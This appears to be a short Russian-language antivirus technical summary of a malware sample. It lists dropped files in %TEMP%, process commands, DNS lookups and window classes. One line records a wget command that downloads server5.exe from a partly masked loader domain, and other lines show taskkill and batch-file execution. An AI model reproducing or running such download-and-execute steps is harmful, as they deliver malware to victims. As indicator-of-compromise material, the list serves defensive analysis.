Техническая информация
- %TEMP%\2.tmp\server5.exe (загружен из сети Интернет)
- %TEMP%\2.tmp\wget.exe http://ve#####et-loader.co.cc/server5.exe
- <SYSTEM32>\ping.exe ya.ru -n 5
- <SYSTEM32>\taskkill.exe /f /im winupd.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\test.bat" "
- <SYSTEM32>\cmd.exe /c ""%TEMP%\2.tmp\winupd.bat" "
- %TEMP%\2.tmp\winupd.bat
- %TEMP%\flash.exe
- %TEMP%\2.tmp\server5.exe
- %TEMP%\2.tmp\wget.exe
- %TEMP%\1.tmp\winupd.exe
- %TEMP%\1.tmp\test.bat
- %TEMP%\winupd.exe
- %TEMP%\1.tmp\flash.exe
- %TEMP%\2.tmp\wget.exe
- %TEMP%\1.tmp\test.bat
- 've#####et-loader.co.cc':80
- ve#####et-loader.co.cc/server5.exe
- DNS ASK ve#####et-loader.co.cc
- DNS ASK ya.ru
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''